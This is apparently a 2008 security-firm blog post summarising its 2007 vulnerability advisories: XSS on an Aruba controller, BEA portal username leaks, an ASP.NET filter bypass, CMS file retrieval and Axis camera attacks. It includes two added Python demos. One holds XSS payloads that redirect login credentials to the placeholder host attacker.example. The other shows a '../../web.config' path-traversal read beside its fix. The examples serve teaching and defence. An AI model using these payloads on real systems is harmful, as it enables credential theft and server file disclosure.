Monday, 28 January 2008

A good year of vulnerability research for ProCheckUp

2007 was a very good year regarding vulnerability/security research for ProCheckUp. In fact, it was the most active year in the history of the company for carrying out research.

A high number of advisory bulletins were published (20 in total), and some advisories feature more than one security vulnerability!

Having established a good relationship with the vendors who produce the software affected by the vulnerabilities we found, we managed to get mentioned on several high-profile vendor sites.

e.g.:

BEA Systems:

http://dev2dev.bea.com/pub/advisory/251
http://dev2dev.bea.com/pub/advisory/252
http://dev2dev.bea.com/pub/advisory/254

Aruba Networks:

http://arubanetworks.com/support/alerts/aid-070907b.asc

Microsoft:

http://www.microsoft.com/technet/security/Bulletin/MS07-040.mspx

Blue Coat Systems:

http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability

Also on smaller vendor sites such as:

http://tincan.co.uk/?lid=1975

And recently, in early 2008, also SUN:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-103180-1

Although some of the issues we have found are very common vanilla (non-persistent) XSS vulnerabilities, we have also found some quite interesting issues. The following are a few of them.


Aruba 800 Mobility Controller Admin Login Page Hack

We found a HIGH-risk persistent XSS on the Aruba 800 Mobility Controller. This attack is very powerful because the attacker can modify the admin login page simply by requesting a specially-crafted URL on the target controller. For example, the attacker could alter the login page so that when the legitimate admin user logs in, his/her password is sent to a third-party site where the attacker logs it.

The beauty of this attack is that the vulnerable device is the "controller" of the entire Wi-Fi network. In other words, if you own the controller, you own the entire Wi-Fi network.

It's worth mentioning that although non-technical users might not be familiar with products from Aruba Networks, their products are very commonly used in high-profile enterprise Wi-Fi networks.


Several information disclosure issues on BEA Portals, including extraction of all portal usernames by unauthenticated users

We found that BEA AquaLogic Interaction and BEA Plumtree Foundation portals allow unauthenticated attackers to obtain every username on the target portal, including those of accounts with full administrative privileges.

Once an attacker has compiled a list of valid usernames, he/she can mount a password-guessing attack against them, which is exactly how we gained access to a BEA portal during a penetration test.

Plumtree and AquaLogic portals are very widely used, not only on intranets but also on Internet-facing sites (almost 400,000 results in Google).


ASP .NET request validation bypass

ASP.NET is considered a very secure framework for building web applications. One of its star features is request validation (enabled through the ValidateRequest directive), a built-in input filter that makes attacks such as XSS much more difficult.

However, we demonstrated how to bypass this filter, which in many cases allows a fully exploitable XSS condition. This is obviously an accomplishment we're quite proud of!
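The following Python example has been added to this post to make two of the points above concrete: how a persistent XSS on a login page (as on the Aruba controller) can redirect submitted credentials to a third party, and why an input-side filter such as request validation is not a substitute for output encoding. It is not ProCheckUp's, Aruba's or Microsoft's code. The denylist regex is an assumption standing in for a request-validation style check (it is not ASP.NET's actual code); the attribute-breakout payload illustrates a generally known limitation of filters that key on '<', not the specific bypass reported in the advisory; and attacker.example is a placeholder host.

```python
import html
import re

# Input-side denylist standing in for a request-validation style filter.
# ASSUMPTION for illustration only: reject '<' followed by a letter, '!', '/'
# or '?', and numeric character references. This is not ASP.NET's code.
INPUT_DENYLIST = re.compile(r"<[a-zA-Z!/?]|&#")

# Marker for script a browser would actually run in the rendered page: a raw
# <script> tag, or a raw on*="..." event-handler attribute.
EXECUTABLE = re.compile(r"<script|\son[a-z]+=[\"']", re.IGNORECASE)

# Constructed payloads. The first mimics the attack described for the Aruba
# controller: rewrite the login form's action so credentials are POSTed to a
# third party (attacker.example is a placeholder host). The second contains
# no '<' at all and breaks out of an attribute instead, a well-known limit of
# '<'-based denylists (not the specific bypass reported in the advisory).
SCRIPT_PAYLOAD = "<script>document.forms[0].action='http://attacker.example/'</script>"
ATTRIBUTE_PAYLOAD = "\" onmouseover=\"document.forms[0].action='http://attacker.example/'"


def input_filter_accepts(value: str) -> bool:
    """True if the (assumed) denylist would let this request parameter through."""
    return INPUT_DENYLIST.search(value) is None


def render_login_page(banner: str, escape_output: bool) -> str:
    """Render a login page that embeds a stored, attacker-controlled 'banner'
    string both as element text and inside an attribute value. With
    escape_output=False this is the vulnerable behaviour; with True the value
    is HTML-encoded at output time (quotes included) and cannot break out."""
    safe = html.escape(banner, quote=True) if escape_output else banner
    return (
        '<form method="POST" action="/login">'
        f'<p class="banner" title="{safe}">{safe}</p>'
        '<input name="user"><input name="pass" type="password">'
        '<input type="submit" value="Log in"></form>'
    )


def page_runs_script(page: str) -> bool:
    """True if the rendered page contains live script or an event handler."""
    return EXECUTABLE.search(page) is not None


def classify(payload: str) -> dict:
    """What each defence does with one payload."""
    return {
        "input_filter_accepts": input_filter_accepts(payload),
        "exploitable_without_encoding": page_runs_script(render_login_page(payload, False)),
        "exploitable_with_encoding": page_runs_script(render_login_page(payload, True)),
    }


if __name__ == "__main__":
    for name, payload in (("script", SCRIPT_PAYLOAD), ("attribute", ATTRIBUTE_PAYLOAD)):
        print(name, classify(payload))
```

The script payload is what the denylist is designed to catch, and it does; the attribute payload sails through because the filter only looks for '<'. Output encoding stops both, which is why it, and not an input filter, is the control to rely on.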


Critical vulnerabilities on Absolute News Manager.NET CMS

Absolute News Manager.NET is a CMS (Content Management System) used by companies that need to update their websites regularly in an easy manner.

We found several HIGH-risk vulnerabilities, including a file retrieval vulnerability that allows attackers to read arbitrary files on the target server. When we found this vulnerability during a pentest, we demonstrated how we could read the contents of the file containing all the database server settings (server name, username, password, etc.).

Provided the database server is reachable from the Internet, this would allow an attacker to gain full access to the back-end database.

Reading the source code of server-side scripts is also possible with this vulnerability.
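As an added example (not Absolute News Manager's code; the directory layout, file names and config contents are constructed samples), the following Python shows the pattern behind this kind of file-retrieval bug, a handler that joins a user-supplied name onto its content directory without checking where the result ends up, next to the canonicalise-then-check fix:

```python
import os
import tempfile

# Constructed sample contents for the file an attacker would go for: the
# application's database settings. Host, account and password are placeholders.
SAMPLE_CONFIG = (
    '<connectionStrings>\n'
    '  <add name="news" connectionString="Server=db.internal;'
    'User Id=newsapp;Password=S3cret!" />\n'
    '</connectionStrings>\n'
)


def build_sample_site() -> str:
    """Create a throwaway site layout: <root>/web.config sits two levels
    above the directory the download handler is meant to serve from."""
    root = tempfile.mkdtemp(prefix="anm_")
    uploads = os.path.join(root, "news", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(root, "web.config"), "w") as f:
        f.write(SAMPLE_CONFIG)
    with open(os.path.join(uploads, "story.txt"), "w") as f:
        f.write("Public news item\n")
    return root


def uploads_dir(root: str) -> str:
    return os.path.join(root, "news", "uploads")


def vulnerable_read(base_dir: str, requested: str) -> bytes:
    """Typical file-retrieval bug: the user-supplied name is joined onto the
    content root with no check, so '..' segments walk out of it and an
    absolute path replaces it outright."""
    with open(os.path.join(base_dir, requested), "rb") as f:
        return f.read()


def hardened_read(base_dir: str, requested: str) -> bytes:
    """Resolve first, then check: realpath collapses '..' and follows
    symlinks, and the result must stay strictly inside the content root."""
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, requested))
    if target == root or os.path.commonpath([root, target]) != root:
        raise PermissionError(f"refusing to serve {requested!r}: outside {root}")
    with open(target, "rb") as f:
        return f.read()


def probe(base_dir: str, requested: str) -> dict:
    """Does each handler hand the file over? PermissionError and the other
    open() failures are all OSError subclasses, so both count as 'no'."""
    result = {}
    for name, handler in (("vulnerable", vulnerable_read), ("hardened", hardened_read)):
        try:
            handler(base_dir, requested)
            result[name] = True
        except OSError:
            result[name] = False
    return result


if __name__ == "__main__":
    root = build_sample_site()
    base = uploads_dir(root)
    for name in ("story.txt", "../../web.config", os.path.join(root, "web.config")):
        print(f"{name!r}: {probe(base, name)}")
```

Note that the check compares path components (os.path.commonpath), not string prefixes, so a sibling directory whose name merely starts with the content root's name is also rejected.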


Multiple vulnerabilities on Axis IP cameras

We found several vulnerabilities on Axis IP cameras, which are used, among other things, for surveillance. One of the highlights of our paper "Owning Big Brother" is a demo exploit that allows an attacker to fully compromise the device when an admin user checks the camera logs!

We included lots of demo attacks/payloads, including stealing the password file and adding a new backdoor account with full privileges on the system.

The demo attack that was most welcomed in the security community was replacing the video stream. This is just like the technique popularised by Hollywood films, in which the attacker swaps the live video feed for a looping clip in order to bypass a building's surveillance system.

Well, those were the highlights of our research for 2007. As you can see, we've kept ourselves pretty busy! Stay tuned for new cutting-edge research in 2008!
